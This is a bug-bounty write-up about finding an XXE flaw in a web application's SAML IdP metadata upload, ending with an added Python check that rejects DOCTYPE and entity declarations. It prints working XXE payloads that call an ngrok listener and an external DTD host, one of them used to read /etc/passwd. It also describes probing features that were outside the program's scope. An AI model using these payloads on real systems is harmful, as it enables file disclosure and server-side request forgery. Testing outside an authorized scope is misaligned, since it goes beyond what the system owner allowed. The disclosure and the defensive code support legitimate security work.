Today I am going to share how I found an XXE in the SAML SSO of one web application. This was a private program on HackerOne, and they were giving out paid-plan credentials for testing, but the scope was limited to only a few features. So after finishing the testing of the in-scope features, I started looking at other features which were not in scope. There was this "Security Controls" feature that attracted me because it allowed different types of authentication.

I checked all of them and saw that SAML was accepting XML in the IdP Metadata field. I had a feeling that I could find something critical here. So I started searching on Google about SAML IdP metadata and came to this website, where you can generate IdP and SP metadata:
https://www.samltool.com/idp_metadata.php
https://www.samltool.com/sp_metadata.php
So I generated this metadata and tried it in the application. Yes, it was accepted, but it did not allow any authentication using it because the data in that IdP metadata XML was wrong. So I tried basic XXE payloads and one payload worked. This is the basic out-of-band payload: if the parser resolves the external parameter entity, the target server makes a request to the listener, which confirms the XXE:
<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "https://app.target.com@29de5f70.ngrok.io"> %asd;]>
Then, a few weeks later, this feature came into scope and I reported it with this payload in the XML as "XXE in SAML SSO". The report was triaged by a HackerOne triager.

Yes, I know, this was my mistake, and I started arguing with him. The triager was also online at that time, so I received answers quickly, and he was telling me the facts.

Then I went through all the PortSwigger XXE labs in 20 minutes and found that we could exploit this case with an external DTD file. So I tried this lab DTD file and got what I needed:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]>

I was able to fetch "/etc/passwd" data using the DTD in the payload. The triager was also nice, and this was his response:

The final XML metadata file was this:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata"
                     validUntil="2020-04-20T14:37:12Z"
                     cacheDuration="PT114100S"
                     entityID="101">
  <md:SPSSODescriptor AuthnRequestsSigned="false" WantAssertionsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
    <md:SingleLogoutService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect"
                            Location="https://app.target.com" />
    <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
    <md:AssertionConsumerService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
                                 Location="https://app.target.com" index="1" />
  </md:SPSSODescriptor>
</md:EntityDescriptor>
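The defensive counterpart, added here as an example and not part of the original write-up: a two-pass gate a service provider can put in front of its IdP-metadata upload, which rejects any DOCTYPE or entity declaration with a bare expat parser (never fetching external entities) before the real parse, and then keeps only the fields the SP needs. The `idp.example` / `listener.example` hosts, the sample documents and the `parse_idp_metadata` helper are assumptions of this example, not the application's code.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

MD_NS = "urn:oasis:names:tc:SAML:2.0:metadata"

class MetadataRejected(ValueError):
    """Uploaded metadata contains something the SAML parser must never process."""

def _reject(msg):
    raise MetadataRejected(msg)

def _assert_no_dtd(xml_bytes: bytes) -> None:
    # Pass 1: a bare expat parser whose handlers abort on any DOCTYPE or entity
    # declaration and which refuses to resolve external entities (returns 0).
    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = lambda *_: _reject("DOCTYPE is not allowed in IdP metadata")
    p.EntityDeclHandler = lambda *_: _reject("entity declarations are not allowed")
    p.ExternalEntityRefHandler = lambda *_: 0  # never fetch anything
    p.Parse(xml_bytes, True)  # malformed XML raises ExpatError here

def parse_idp_metadata(xml_bytes: bytes) -> dict:
    # Pass 2: parse vetted metadata and keep only what the SP needs from it.
    _assert_no_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    if root.tag != f"{{{MD_NS}}}EntityDescriptor" or not root.get("entityID"):
        raise MetadataRejected("root must be md:EntityDescriptor with an entityID")
    endpoints = [(el.tag.rsplit("}", 1)[-1], el.get("Binding"), el.get("Location"))
                 for el in root.iter() if el.get("Location")]
    for _, _, loc in endpoints:
        if not loc.startswith("https://"):  # SSO/SLO/ACS endpoints must be HTTPS
            raise MetadataRejected(f"non-HTTPS endpoint: {loc}")
    return {"entityID": root.get("entityID"), "endpoints": endpoints}

def rejection_reason(xml_bytes: bytes):
    # None if the metadata is accepted, otherwise the reason it was refused.
    try:
        parse_idp_metadata(xml_bytes)
        return None
    except (MetadataRejected, ET.ParseError, xml.parsers.expat.ExpatError) as exc:
        return str(exc)

# Constructed samples: a benign IdP document, and one with the same DOCTYPE shape
# as the write-up's payload (listener host is a placeholder, not a real server).
CLEAN_METADATA = b"""<?xml version="1.0"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://idp.example/metadata">
<md:IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"><md:SingleSignOnService
 Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://idp.example/sso"/>
</md:IDPSSODescriptor></md:EntityDescriptor>"""
XXE_METADATA = b"""<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://listener.example/exploit.dtd"> %xxe;]>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="101"/>"""
```

The first pass fires on the DOCTYPE before any entity could be resolved, so the write-up's blind and DTD-based variants are refused at the same point.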
That's all Folks!
Thank you
Jai Hind!!!